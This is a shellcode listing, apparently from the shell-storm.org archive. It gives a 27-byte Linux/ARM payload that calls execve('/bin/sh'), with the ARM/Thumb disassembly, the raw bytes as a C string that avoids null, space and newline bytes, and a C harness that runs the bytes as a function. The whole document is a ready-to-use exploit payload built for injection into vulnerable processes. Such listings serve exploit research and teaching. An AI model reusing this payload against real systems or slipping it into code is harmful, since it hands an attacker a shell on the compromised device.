Linux/ARM - execve("/bin/sh", [0], [0 vars]) - 27 bytes
Source: shell-storm.org  Author: Salwan  Published: 2010-09-06

/*
Title:     Linux/ARM - execve("/bin/sh", [0], [0 vars]) - 27 bytes
Date:      2010-08-31
Tested on: ARM926EJ-S rev 5 (v5l)
Author:    Jonathan Salwan - twitter: @shell_storm

shell-storm.org

ARM shellcode containing no 0x20, 0x0a or 0x00 bytes


Disassembly of section .text:

00008054 <_start>:
    8054: e28f3001  add r3, pc, #1 ; 0x1
    8058: e12fff13  bx r3
    805c: 4678       mov r0, pc
    805e: 3008       adds r0, #8
    8060: 1a49       subs r1, r1, r1
    8062: 1a92       subs r2, r2, r2
    8064: 270b       movs r7, #11
    8066: df01       svc 1
    8068: 622f       str r7, [r5, #32]
    806a: 6e69       ldr r1, [r5, #100]
    806c: 732f       strb r7, [r5, #12]
    806e: 0068       lsls r0, r5, #1

*/

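#include <stdio.h>
#include <string.h>   /* strlen() */

/* The 27 bytes from the disassembly above; the last 7 are the "/bin/sh" string. */
char SC[] = "\x01\x30\x8f\xe2"   /* add r3, pc, #1 */
            "\x13\xff\x2f\xe1"   /* bx r3 (switch to Thumb) */
            "\x78\x46\x08\x30"   /* mov r0, pc ; adds r0, #8 */
            "\x49\x1a\x92\x1a"   /* subs r1, r1, r1 ; subs r2, r2, r2 */
            "\x0b\x27\x01\xdf"   /* movs r7, #11 ; svc 1 */
            "\x2f\x62\x69\x6e"   /* "/bin" */
            "\x2f\x73\x68";      /* "/sh" */


int main(void)
{
        /* strlen() returns size_t, so print it with %zu */
        fprintf(stdout, "Length: %zu\n", strlen(SC));
        (*(void(*)()) SC)();
        return 0;
}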


 